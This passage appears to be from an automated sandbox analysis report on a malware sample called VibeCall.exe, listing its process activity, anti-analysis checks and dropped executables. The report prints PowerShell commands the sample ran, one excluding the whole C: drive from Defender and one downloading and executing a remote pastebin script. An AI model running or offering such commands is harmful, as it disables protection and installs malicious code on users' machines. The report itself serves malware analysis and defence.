                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\aisolution_vibecall_a.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\contry_solution_vibecall_e.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                      Source: C:\Users\user\Downloads\videosolution_vibecall_b.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\fontdrvhost.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\fontdrvhost.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\System32\WerFault.exe | Process information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

                      Source: C:\Users\user\Desktop\VibeCall.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                      Source: C:\Users\user\Desktop\VibeCall.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
                      Source: C:\Users\user\AppData\Local\Temp\aisolution_vibecall_a.exe | API/Special instruction interceptor: Address: 7FFE2220D044
                      Source: C:\Windows\SysWOW64\fontdrvhost.exe | API/Special instruction interceptor: Address: 7FFE2220D044
                      Source: C:\Users\user\AppData\Local\Temp\contry_solution_vibecall_e.exe | API/Special instruction interceptor: Address: 7FFE2220D044
                      Source: C:\Windows\SysWOW64\fontdrvhost.exe | API/Special instruction interceptor: Address: 4D3B83A
                      Source: C:\Windows\SysWOW64\fontdrvhost.exe | API/Special instruction interceptor: Address: 570B83A
                      Source: C:\Users\user\Downloads\videosolution_vibecall_b.exe | API/Special instruction interceptor: Address: 7FFE2220D044
                      Source: C:\Windows\SysWOW64\fontdrvhost.exe | API/Special instruction interceptor: Address: 561B83A
                      Source: C:\Users\user\Desktop\VibeCall.exe | Memory allocated: 18C15A90000 memory reserve | memory write watch
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                      Source: C:\Users\user\Desktop\VibeCall.exe | Window / User API: threadDelayed 709
                      Source: C:\Users\user\Desktop\VibeCall.exe | Window / User API: threadDelayed 366
                      Source: C:\Users\user\Desktop\VibeCall.exe | Window / User API: threadDelayed 7938
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 6499
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3205
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4742
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1304
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1515
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 8078
                      Source: C:\Users\user\Downloads\videosolution_vibecall_b.exe | API coverage: 0.0 %
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7240 | Thread sleep count: 6499 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7240 | Thread sleep count: 3205 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7276 | Thread sleep time: -8301034833169293s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7352 | Thread sleep count: 4742 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7356 | Thread sleep count: 1304 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7392 | Thread sleep time: -8301034833169293s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7416 | Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7432 | Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7820 | Thread sleep count: 1515 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7820 | Thread sleep count: 8078 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7876 | Thread sleep time: -5534023222112862s >= -30000s
                      Source: C:\Users\user\Desktop\VibeCall.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Manufacturer FROM Win32_BIOS
                      Source: C:\Users\user\Desktop\VibeCall.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT TotalPhysicalMemory FROM Win32_ComputerSystem
                      Source: C:\Users\user\Desktop\VibeCall.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                      Source: powershell.exe, 00000004.00000002.1880930127.000001DC748E0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllo
                      Source: contry_solution_vibecall_e.exe, 0000000F.00000003.2479874720.0000000003C80000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: DisableGuestVmNetworkConnectivity
                      Source: VibeCall.exe, 00000000.00000003.2041460055.000001CCB612F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
                      Source: contry_solution_vibecall_e.exe, 0000000F.00000003.2479874720.0000000003C80000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: EnableGuestVmNetworkConnectivity
                      Source: C:\Users\user\Desktop\VibeCall.exe | Process information queried: ProcessInformation
                      Source: C:\Users\user\Desktop\VibeCall.exe | Process queried: DebugPort
                      Source: C:\Users\user\AppData\Local\Temp\aisolution_vibecall_a.exe | Process queried: DebugPort
                      Source: C:\Users\user\AppData\Local\Temp\contry_solution_vibecall_e.exe | Process queried: DebugPort
                      Source: C:\Users\user\Downloads\videosolution_vibecall_b.exe | Process queried: DebugPort
                      Source: C:\Users\user\AppData\Local\Temp\aisolution_vibecall_a.exe | Code function: 14_3_013B4ED5 LdrInitializeThunk,VirtualFree, 14_3_013B4ED5
                      Source: C:\Users\user\AppData\Local\Temp\aisolution_vibecall_a.exe | Code function: 14_3_013B7D4D IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 14_3_013B7D4D
                      Source: C:\Users\user\AppData\Local\Temp\aisolution_vibecall_a.exe | Code function: 14_3_01640277 mov eax, dword ptr fs:[00000030h] 14_3_01640277
                      Source: C:\Users\user\AppData\Local\Temp\aisolution_vibecall_a.exe | Code function: 14_2_01640277 mov eax, dword ptr fs:[00000030h] 14_2_01640277
                      Source: C:\Users\user\AppData\Local\Temp\contry_solution_vibecall_e.exe | Code function: 15_3_02F20277 mov eax, dword ptr fs:[00000030h] 15_3_02F20277
                      Source: C:\Users\user\AppData\Local\Temp\contry_solution_vibecall_e.exe | Code function: 15_2_02F20277 mov eax, dword ptr fs:[00000030h] 15_2_02F20277
                      Source: C:\Users\user\Downloads\videosolution_vibecall_b.exe | Code function: 18_3_01669277 mov eax, dword ptr fs:[00000030h] 18_3_01669277
                      Source: C:\Windows\SysWOW64\fontdrvhost.exe | Code function: 25_3_00380283 mov eax, dword ptr fs:[00000030h] 25_3_00380283
                      Source: C:\Windows\SysWOW64\fontdrvhost.exe | Code function: 31_3_00B30283 mov eax, dword ptr fs:[00000030h] 31_3_00B30283
                      Source: C:\Windows\SysWOW64\fontdrvhost.exe | Code function: 40_3_02D10283 mov eax, dword ptr fs:[00000030h] 40_3_02D10283
                      Source: C:\Users\user\Desktop\VibeCall.exe | Process token adjusted: Debug
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
                      Source: C:\Users\user\AppData\Local\Temp\aisolution_vibecall_a.exe | Code function: 14_3_013B7D4D IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 14_3_013B7D4D
                      Source: C:\Users\user\AppData\Local\Temp\aisolution_vibecall_a.exe | Code function: 14_3_013B800F SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 14_3_013B800F
                      Source: C:\Users\user\AppData\Local\Temp\aisolution_vibecall_a.exe | Code function: 14_3_013C4B0C IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 14_3_013C4B0C
                      Source: C:\Users\user\AppData\Local\Temp\contry_solution_vibecall_e.exe | Code function: 15_3_01617D4D IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 15_3_01617D4D
                      Source: C:\Users\user\AppData\Local\Temp\contry_solution_vibecall_e.exe | Code function: 15_3_0161800F SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 15_3_0161800F
                      Source: C:\Users\user\AppData\Local\Temp\contry_solution_vibecall_e.exe | Code function: 15_3_01624B0C IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 15_3_01624B0C
                      Source: C:\Users\user\Desktop\VibeCall.exe | Memory allocated: page read and write | page guard

                      HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\VibeCall.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:'
Source: C:\Users\user\Desktop\VibeCall.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr 'https://pastebin.com/raw/QE03kE1s' -UseBasicParsing).Content"
Source: C:\Users\user\Desktop\VibeCall.exe | Process created: C:\Users\user\AppData\Local\Temp\aisolution_vibecall_a.exe "C:\Users\user\AppData\Local\Temp\aisolution_vibecall_a.exe"
Source: C:\Users\user\Desktop\VibeCall.exe | Process created: C:\Users\user\AppData\Local\Temp\contry_solution_vibecall_e.exe "C:\Users\user\AppData\Local\Temp\contry_solution_vibecall_e.exe"
Source: C:\Users\user\Desktop\VibeCall.exe | Process created: C:\Users\user\Downloads\soundsolution_vibecall_c.exe "C:\Users\user\Downloads\soundsolution_vibecall_c.exe"
Source: C:\Users\user\Desktop\VibeCall.exe | Process created: C:\Users\user\Downloads\videosolution_vibecall_b.exe "C:\Users\user\Downloads\videosolution_vibecall_b.exe"
Source: C:\Users\user\AppData\Local\Temp\aisolution_vibecall_a.exe | Process created: C:\Windows\SysWOW64\fontdrvhost.exe "C:\Windows\System32\fontdrvhost.exe"
Source: C:\Users\user\AppData\Local\Temp\contry_solution_vibecall_e.exe | Process created: C:\Windows\SysWOW64\fontdrvhost.exe "C:\Windows\System32\fontdrvhost.exe"
Source: C:\Users\user\Downloads\videosolution_vibecall_b.exe | Process created: C:\Windows\SysWOW64\fontdrvhost.exe "C:\Windows\System32\fontdrvhost.exe"
Source: C:\Windows\SysWOW64\fontdrvhost.exe | Process created: C:\Windows\System32\fontdrvhost.exe "C:\Windows\System32\fontdrvhost.exe"
Source: C:\Users\user\AppData\Local\Temp\aisolution_vibecall_a.exe | Code function: 14_3_013B781B cpuid 14_3_013B781B
Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation
Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation
Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
Source: C:\Users\user\Desktop\VibeCall.exe | Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
